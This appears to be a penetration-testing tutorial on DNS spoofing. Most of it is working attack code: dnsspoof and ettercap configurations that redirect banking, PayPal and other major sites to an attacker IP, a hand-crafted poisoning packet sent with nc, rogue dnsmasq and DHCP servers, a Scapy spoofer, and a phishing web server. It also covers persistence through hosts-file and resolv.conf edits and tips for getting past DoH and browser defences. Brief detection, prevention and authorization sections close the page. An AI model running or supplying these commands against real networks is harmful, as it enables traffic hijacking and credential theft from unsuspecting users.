DNS Spoofing

Understanding DNS Spoofing - Domain Name Resolution Manipulation

What is DNS Spoofing?

Simple Definition: DNS spoofing involves providing false DNS responses to redirect users from legitimate websites to attacker-controlled servers by manipulating domain name resolution, enabling phishing attacks and traffic interception.

Technical Definition: DNS spoofing exploits the Domain Name System’s lack of authentication to inject false DNS responses that redirect domain queries to malicious IP addresses, enabling comprehensive traffic redirection, credential harvesting, and content manipulation through authoritative control over name resolution.

Why DNS Spoofing Works

DNS spoofing succeeds due to fundamental protocol design limitations:

  • No Response Authentication: DNS protocol lacks cryptographic validation of responses
  • First Response Wins: Clients accept the first received DNS response for queries
  • Cache-Based Resolution: DNS resolvers cache responses, amplifying spoofing impact
  • UDP-Based Protocol: Connectionless protocol enables easy response injection

Attack Process Breakdown

Normal DNS Resolution

  1. DNS Query: Client sends domain name query to DNS resolver
  2. Recursive Resolution: DNS resolver queries authoritative servers for domain
  3. Authoritative Response: Legitimate DNS server provides correct IP address
  4. Cache Update: Resolver caches response and returns result to client
  5. Client Connection: Client connects to legitimate server using resolved IP

DNS Spoofing Process

  1. Traffic Monitoring: Monitor DNS queries from target systems
  2. Response Injection: Send false DNS responses before legitimate replies
  3. Cache Poisoning: Inject malicious entries into DNS resolver caches
  4. Traffic Redirection: Direct clients to attacker-controlled servers
  5. Attack Implementation: Execute phishing, credential harvesting, or content manipulation

Real-World Impact

Credential Harvesting: Redirect users to fake login pages for password theft

Phishing Enhancement: Direct victims to convincing replicas of legitimate websites

Traffic Interception: Route all communications through attacker-controlled infrastructure

Content Manipulation: Serve malicious content appearing to come from trusted sources

Business Disruption: Redirect customers away from legitimate business websites

Technical Concepts

DNS Protocol Fundamentals

DNS Query Types: A (IPv4), AAAA (IPv6), MX (mail), CNAME (canonical name), NS (nameserver) Query Process: Recursive resolution through DNS hierarchy Caching Mechanism: TTL-based response caching for performance Authority Structure: Authoritative vs recursive DNS servers

Spoofing Techniques

Response Racing: Send false responses faster than legitimate servers Cache Poisoning: Inject malicious entries into DNS resolver caches Local DNS Override: Modify local DNS configuration or hosts files Rogue DNS Server: Deploy fake DNS servers on compromised networks

Attack Positioning Methods

Network-Level Spoofing: Intercept and respond to DNS queries on network MitM Integration: Combine with ARP spoofing for comprehensive positioning Rogue Access Point: Deploy fake wireless networks with malicious DNS DHCP Manipulation: Distribute malicious DNS server addresses via DHCP

Technical Implementation

Prerequisites

Network Requirements:

  • Ability to intercept or respond to DNS queries
  • Understanding of target DNS infrastructure
  • Network positioning for DNS response injection

Essential Tools:

  • DNSSpoof: Simple DNS response spoofing tool
  • Ettercap: Integrated DNS spoofing with MitM positioning
  • Bettercap: Modern network attack framework with DNS capabilities
  • Responder: LLMNR, NBT-NS, and MDNS poisoner

Essential Command Sequence

Step 1: DNS Infrastructure Analysis 

# Identify target DNS configuration
nslookup example.com
# Shows current DNS resolution for target domain
# Identifies legitimate IP addresses
# Provides baseline for spoofing detection

# Discover DNS servers in use
cat /etc/resolv.conf
# Shows configured DNS servers
# Identifies targets for cache poisoning
# Reveals DNS infrastructure dependencies

# Test DNS response times
dig @8.8.8.8 example.com +stats
# Shows query time and response characteristics
# Identifies timing windows for response racing
# Reveals DNS performance baselines

Purpose: Understand target DNS infrastructure and resolution patterns to optimize spoofing effectiveness.

Step 2: Basic DNS Spoofing Setup

Using DNSSpoof for Simple Spoofing:

# Create DNS spoofing configuration
echo "example.com 192.168.1.50" > dns_spoof.conf
echo "*.facebook.com 192.168.1.50" >> dns_spoof.conf
echo "*.google.com 192.168.1.50" >> dns_spoof.conf
# Maps domains to attacker-controlled IP
# Supports wildcard patterns for comprehensive coverage
# Redirects multiple popular sites to single server

# Start DNS spoofing
dnsspoof -i eth0 -f dns_spoof.conf
# -i eth0: Network interface for spoofing
# -f: Configuration file with domain mappings
# Intercepts and responds to DNS queries

Using Ettercap with Integrated MitM:

# Configure ettercap DNS spoofing targets
echo "*.bank.com A 192.168.1.50" >> /etc/ettercap/etter.dns
echo "*.paypal.com A 192.168.1.50" >> /etc/ettercap/etter.dns
echo "*.amazon.com A 192.168.1.50" >> /etc/ettercap/etter.dns
# Ettercap-specific DNS configuration format
# Targets high-value domains for credential harvesting
# Integrates with ARP spoofing for positioning

# Launch combined ARP spoofing and DNS spoofing
ettercap -T -M arp:remote /192.168.1.100// /192.168.1.1// -P dns_spoof
# -P dns_spoof: Enable DNS spoofing plugin
# Combines Layer 2 positioning with DNS manipulation
# Comprehensive traffic redirection capability

Step 3: DNS Cache Poisoning 

# Monitor DNS queries for timing
tcpdump -i eth0 port 53
# Captures DNS traffic for analysis
# Shows query patterns and timing
# Identifies opportunities for response injection

# Implement DNS cache poisoning with custom responses
dig @192.168.1.1 example.com &
# Send legitimate query to trigger resolver cache update
# Background process to avoid blocking

# Send false response immediately
echo -e '\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00\x07example\x03com\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\x00\x0e\x10\x00\x04\xc0\xa8\x01\x32' | \
nc -u 192.168.1.1 53
# Crafted DNS response packet
# Poisons resolver cache with false entry
# Affects all subsequent queries for domain

Step 4: Rogue DNS Server Deployment

Configure Local DNS Server:

# Install and configure dnsmasq as rogue DNS server
apt update && apt install dnsmasq

# Configure malicious DNS responses
cat > /etc/dnsmasq.conf << EOF
listen-address=192.168.1.50
no-dhcp-interface=
address=/facebook.com/192.168.1.50
address=/google.com/192.168.1.50
address=/amazon.com/192.168.1.50
address=/paypal.com/192.168.1.50
# Wildcard redirections for popular sites
address=/#/192.168.1.50
EOF

# Start rogue DNS server
systemctl start dnsmasq
systemctl enable dnsmasq
# Starts malicious DNS service
# Responds to all queries with attacker IP
# Creates comprehensive traffic redirection

DHCP Integration for DNS Distribution:

# Configure DHCP to distribute malicious DNS servers
cat > /etc/dhcp/dhcpd.conf << EOF
default-lease-time 600;
max-lease-time 7200;

subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.200;
    option routers 192.168.1.1;
    option domain-name-servers 192.168.1.50;  # Rogue DNS server
    option domain-name "local";
}
EOF

# Start rogue DHCP server
systemctl start isc-dhcp-server
# Distributes malicious DNS configuration
# Affects new DHCP clients automatically
# Persistent DNS redirection

Step 5: Advanced DNS Spoofing Techniques

Selective Domain Spoofing:

#!/usr/bin/env python3
from scapy.all import *
import threading

class SelectiveDNSSpoof:
    def __init__(self, interface, target_domains, redirect_ip):
        self.interface = interface
        self.target_domains = target_domains
        self.redirect_ip = redirect_ip
        self.spoofing_active = True
    
    def packet_handler(self, packet):
        """Handle DNS packets for selective spoofing"""
        
        if packet.haslayer(DNSQR) and packet.haslayer(UDP):
            # Extract query information
            query_name = packet[DNSQR].qname.decode('utf-8').rstrip('.')
            
            # Check if domain should be spoofed
            should_spoof = False
            for domain in self.target_domains:
                if domain in query_name or query_name.endswith(domain):
                    should_spoof = True
                    break
            
            if should_spoof:
                # Craft spoofed DNS response
                spoofed_response = IP(src=packet[IP].dst, dst=packet[IP].src)/\
                                 UDP(sport=packet[UDP].dport, dport=packet[UDP].sport)/\
                                 DNS(id=packet[DNS].id, qr=1, aa=1, qd=packet[DNS].qd,
                                     an=DNSRR(rrname=packet[DNSQR].qname, ttl=300,
                                             rdata=self.redirect_ip))
                
                # Send spoofed response
                send(spoofed_response, verbose=False)
                print(f"Spoofed DNS query for {query_name} -> {self.redirect_ip}")
    
    def start_spoofing(self):
        """Start DNS spoofing with packet sniffing"""
        print(f"Starting selective DNS spoofing on {self.interface}")
        print(f"Target domains: {self.target_domains}")
        print(f"Redirect IP: {self.redirect_ip}")
        
        # Start packet capture and processing
        sniff(iface=self.interface, filter="udp port 53", 
              prn=self.packet_handler, store=0)

# Configure and start selective DNS spoofing
target_domains = ["facebook.com", "google.com", "amazon.com", "paypal.com"]
spoofer = SelectiveDNSSpoof("eth0", target_domains, "192.168.1.50")
spoofer.start_spoofing()

Attack Variations

Protocol-Specific Spoofing 

# Target IPv6 DNS queries (AAAA records)
dig AAAA example.com
# Test IPv6 DNS resolution
# Often overlooked in security configurations
# May provide alternate attack vector

# Spoof IPv6 DNS responses
echo "example.com AAAA 2001:db8::50" >> dns_spoof_ipv6.conf
dnsspoof -i eth0 -f dns_spoof_ipv6.conf
# IPv6 DNS spoofing configuration
# Redirects IPv6 traffic to attacker
# Useful in dual-stack environments

Integration with Social Engineering 

# Create convincing phishing infrastructure
# Set up web server on redirected IP
python3 -m http.server 80 --directory /var/www/phishing
# Serves convincing replicas of target sites
# Captures credentials from DNS-redirected users
# Integrates with DNS spoofing for complete attack

# Log DNS spoofing victims
tcpdump -i eth0 port 53 -w dns_victims.pcap
# Captures DNS queries for victim identification
# Shows effectiveness of spoofing campaign
# Enables targeted follow-up attacks

Automated DNS Poisoning 

# Automated DNS cache poisoning script
#!/bin/bash
TARGETS=("example.com" "test.org" "sample.net")
RESOLVER="192.168.1.1"
MALICIOUS_IP="192.168.1.50"

for domain in "${TARGETS[@]}"; do
    # Send query to trigger cache lookup
    dig @$RESOLVER $domain >/dev/null 2>&1 &
    
    # Immediately send spoofed response
    python3 dns_poison.py $RESOLVER $domain $MALICIOUS_IP &
    
    echo "Poisoning attempt for $domain"
    sleep 1
done

wait
echo "DNS cache poisoning campaign completed"

Common Issues and Solutions

Problem: DNS spoofing responses arriving after legitimate responses

  • Solution: Implement faster response timing, position closer to target, use cache poisoning techniques

Problem: DNS over HTTPS (DoH) bypassing spoofing attempts

  • Solution: Block DoH traffic, target legacy DNS, combine with application-layer attacks

Problem: Modern browsers ignoring spoofed responses

  • Solution: Target older applications, combine with certificate manipulation, use social engineering

Problem: Limited effectiveness against recursive DNS servers

  • Solution: Target authoritative servers, implement cache poisoning, use rogue DNS infrastructure

Advanced Techniques

DNS Tunneling Detection and Exploitation 

#!/usr/bin/env python3
from scapy.all import *

def dns_tunnel_detector(packet):
    """Detect and potentially exploit DNS tunneling"""
    
    if packet.haslayer(DNSQR):
        query = packet[DNSQR].qname.decode('utf-8')
        
        # Look for suspicious patterns indicating tunneling
        if len(query) > 50 or '.' in query.replace('.', '', 2):
            print(f"Potential DNS tunnel detected: {query}")
            
            # Could inject malicious responses into tunnel
            # Implementation depends on specific tunnel protocol

# Monitor for DNS tunneling
sniff(filter="udp port 53", prn=dns_tunnel_detector)

Multi-Vector DNS Attacks 

# Combine DNS spoofing with multiple attack vectors
# 1. ARP spoofing for positioning
ettercap -T -M arp:remote /192.168.1.100// /192.168.1.1// &

# 2. DNS spoofing for redirection  
ettercap -T -P dns_spoof &

# 3. HTTP proxy for content manipulation
mitmproxy --mode transparent --listen-port 8080 &

# 4. HTTPS certificate manipulation
mitmproxy --mode transparent --listen-port 8443 --certs /path/to/certs &

# Comprehensive attack integrating multiple techniques
# Maximum impact through coordinated attack vectors

Persistent DNS Redirection 

# Modify system DNS configuration for persistence
echo "nameserver 192.168.1.50" > /etc/resolv.conf
chattr +i /etc/resolv.conf
# Makes DNS configuration immutable
# Ensures persistent redirection
# Requires root access on target system

# Alternative: Modify hosts file
echo "192.168.1.50 facebook.com" >> /etc/hosts
echo "192.168.1.50 google.com" >> /etc/hosts
echo "192.168.1.50 amazon.com" >> /etc/hosts
# Direct hostname resolution bypass
# Overrides DNS resolution entirely
# Persistent local redirection

Detection and Prevention

Detection Indicators

  • Unexpected DNS response sources or timing
  • DNS queries receiving responses from unauthorized servers
  • Unusual DNS traffic patterns or volumes
  • Certificate warnings for normally trusted sites
  • Applications failing to connect to expected services

Prevention Measures

DNS Security Implementation:

  • Deploy DNS Security Extensions (DNSSEC) for response validation
  • Use DNS over HTTPS (DoH) or DNS over TLS (DoT)
  • Implement DNS filtering and monitoring
  • Configure secure DNS servers (Quad9, Cloudflare, etc.)

Network Configuration:

# Configure secure DNS resolution
echo "nameserver 9.9.9.9" > /etc/resolv.conf  # Quad9
echo "nameserver 1.1.1.1" >> /etc/resolv.conf  # Cloudflare
# Use DNS providers with security filtering

# Block unauthorized DNS traffic
iptables -A OUTPUT -p udp --dport 53 ! -d 9.9.9.9 -j DROP
iptables -A OUTPUT -p udp --dport 53 ! -d 1.1.1.1 -j DROP

Application Security:

  • Implement certificate pinning in applications
  • Use HSTS (HTTP Strict Transport Security)
  • Deploy application-layer DNS validation
  • Monitor for certificate changes and anomalies

Professional Context

Legitimate Use Cases

  • Security Testing: Evaluating DNS security controls and response validation
  • Penetration Testing: Demonstrating DNS-based attack vectors
  • Network Troubleshooting: Testing DNS resolution and configuration
  • Security Training: Educational demonstration of DNS vulnerabilities

Legal and Ethical Requirements

Authorization: DNS spoofing can redirect sensitive communications - explicit written permission essential

Scope Definition: Clearly identify which domains and DNS infrastructure are in-scope for testing

Impact Assessment: Document potential for credential exposure and business disruption

Restoration Procedures: Ensure ability to restore normal DNS resolution after testing

DNS spoofing attacks highlight fundamental weaknesses in internet infrastructure and demonstrate the critical importance of DNS security measures, providing essential skills for security assessment while emphasizing the need for comprehensive DNS protection strategies.